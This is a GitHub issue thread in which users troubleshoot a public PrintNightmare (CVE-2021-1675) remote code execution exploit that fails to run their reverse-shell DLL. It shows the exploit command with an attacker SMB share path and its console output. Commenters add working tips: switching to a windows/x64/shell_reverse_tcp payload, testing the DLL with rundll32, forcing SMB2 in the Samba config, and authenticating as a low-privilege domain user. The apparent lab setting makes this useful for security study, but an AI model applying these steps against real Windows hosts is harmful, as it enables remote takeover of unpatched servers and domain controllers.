
Exploit runs but no execution/ Stuck on stage 0

Open pr0t0nus3rxyz opened this issue 3 years ago • 16 comments

$ python .\CVE-2021-1675.py ignite.local/techuser:[email protected] "\\10.10.10.155\share\meter.dll"
[*] Try 1...
[*] Connecting to ncacn_np:10.10.10.156[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL
[*] Executing \\10.10.10.155\share\meter.dll
[*] Stage0: 0
[*] Try 2...
[*] Connecting to ncacn_np:10.10.10.156[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL
[*] Executing \\10.10.10.155\share\meter.dll
[*] Stage0: 0
[*] Try 3...
[*] Connecting to ncacn_np:10.10.10.156[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL
[*] Executing \\10.10.10.155\share\meter.dll
[*] Stage0: 0

The DLL doesn't get executed.

pr0t0nus3rxyz, Jul 02 '21 07:07

Windows Server 2016 and Windows 10 Pro.

pr0t0nus3rxyz, Jul 02 '21 07:07

Check whether your DLL reverse shell runs correctly on its own: rundll32 meter.dll,Start

andreluna, Jul 02 '21 12:07

Same here.

WhiteHSBG, Jul 02 '21 15:07

https://github.com/cube0x0/CVE-2021-1675/issues/19

BlackSnufkin, Jul 02 '21 16:07

Check whether your DLL reverse shell runs correctly on its own: rundll32 meter.dll,Start

Yes, it works fine with rundll32, but not through the RCE.

pr0t0nus3rxyz, Jul 03 '21 11:07

I am having the same issue. Windows Server 2019, it is a DC. The DLL is uploaded, but not executed. When I run it manually on the server it executes fine.

korang, Jul 04 '21 02:07

#19

Thanks, this is very useful. I used windows/x64/meterpreter/reverse_tcp, that was a mistake.

WhiteHSBG, Jul 04 '21 04:07

See https://github.com/cube0x0/CVE-2021-1675/pull/25

citronneur, Jul 04 '21 15:07

#19

Thanks, this is very useful. I used windows/x64/meterpreter/reverse_tcp, that was a mistake.

I have tried both meterpreter and shell with no execution.

korang, Jul 04 '21 16:07

#19

Thanks, this is very useful. I used windows/x64/meterpreter/reverse_tcp, that was a mistake.

I have tried both meterpreter and shell with no execution.

Try this payload instead: windows/x64/shell_reverse_tcp

WhiteHSBG, Jul 04 '21 17:07

See #25

How do you know which driver to use, or which directory path to use?

korang, Jul 04 '21 20:07

It's just the name of the new driver, choose one randomly!

citronneur, Jul 04 '21 20:07

Previously the exploit used "1234" as the name, choose whichever one you want!

citronneur, Jul 04 '21 20:07

Hello! I was having the same issue. I think it's related to the SMB version that you are using. In my lab I had a Windows Server 2019 and it was using SMB version 2, so I went to my Kali's /etc/samba/smb.conf and added this line to the end of [global]:

min protocol = SMB2

Then I restarted the nmbd and smbd services, ran the Python script and was able to open a reverse shell. Cheers!

MPereira95, Jul 07 '21 09:07

I also created a low-privilege user in my Windows Server AD and used those credentials when executing the Python script.

MPereira95, Jul 07 '21 11:07

You should not use administrator users.

zuchuanchengxuyuan, Jul 16 '21 09:07